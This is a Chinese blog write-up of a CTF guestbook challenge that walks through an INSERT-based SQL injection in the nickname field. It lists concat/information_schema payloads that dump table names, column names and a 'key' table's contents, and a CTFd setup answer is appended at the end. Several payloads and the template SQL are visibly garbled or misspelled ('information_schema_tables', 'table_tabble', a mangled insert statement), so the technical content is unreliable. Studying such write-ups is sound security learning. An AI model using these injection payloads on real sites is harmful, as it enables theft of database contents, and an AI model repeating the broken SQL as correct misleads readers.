合天-ctf简易留言板

这题是二次注入的
二次注入的关键是要把填写的信息注入到存储里
大概的数据库模式是 insert into table_name(id,name) value (‘ i d ′ , ′ id',' id,name’)
看回题目

一、判断

在这里插入图片描述这里看存储型的话,之前我能想到的都是XSS,现在考虑insert注入,因此用单引号(失败)测试,再接着使用双引号(这次是成功),发现漏洞子昵称框内。

二、判断注入类型

注入一:1’,‘2’)# 注入失败
再猜,发现id和时间now()自动生成,因此觉得注入函数应该为
insert into tabel_name(1,2,3,4)value (null,‘ i d ′ , ′ id',' id,name’,now())
注入二:2’,‘3’,4)# 注入成功并发现注入点在2和3

三、正式注入

主要注入模块2’,‘3’,4)# 把2或3替换掉

1.爆表名

concat(0x7e,(select concat(table_name)from information_schema_tables where table_schema=database() limit 0,1))
concat(0x7e,(select concat(table_name)from information_schema_tables where table_schema=database() limit 1,1))
得到表名key

2.爆列名

concat(0x7e,(select concat(table_column)from information_schema_columns where table_tabble=‘key’ limit 0,1))
列名id,key

3.爆数据

concat(0x7e,(select concat(key)from key where id=1 ))
这题尝试到id=12的时候能出答案

PS:值得注意的一点是,在最后读取key的内容时,无论是concat中的key还是from后面的key,都是使用反引号括起来的,而不是单引号,这是为什么呢?
加反引号是因为有时候定义的表名或者字段名时与系统关键字发生冲突,所以才用反引号引起来,如果能确保不使用关键字就可以不用反引号。而我们实验中的key,正好时mysql自身的一个关键字。所以需要用反引号括起来

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFd是一个用于举办和参加CTF(Capture The Flag)安全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经安装了虚拟机并配置好了Ubuntu系统。具体的安装和配置步骤可以参考相关的教程。 2. 配置阿里云镜像下载源文件。这可以加快软件包的下载速度。你可以按照引用\[1\]中的指导进行配置。 3. 进入CTFd目录。在终端中使用cd命令进入CTFd的目录。 4. 使用gunicorn工具配置CTFd。根据引用\[2\]和引用\[3\]的内容,你可以使用以下命令配置gunicorn工具: ``` gunicorn --bind 0.0.0.0:8000 -w 5 "CTFd:create_app()" ``` 5. 如果你希望在重启电脑后再次运行CTFd平台,确保以root权限运行。在Ubuntu终端中使用sudo命令运行上述命令。 这样,你就可以在Ubuntu上成功搭建CTFd平台了。请注意,这只是一个简单的搭建过程,具体的配置和使用方法可能会有所不同,你可以参考相关的文档和教程进行更详细的了解和操作。 #### 引用[.reference_title] - *1* *2* *3* [基于Ubuntu搭建CTFd平台(全网最全)](https://blog.csdn.net/qq_25953411/article/details/127489944)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值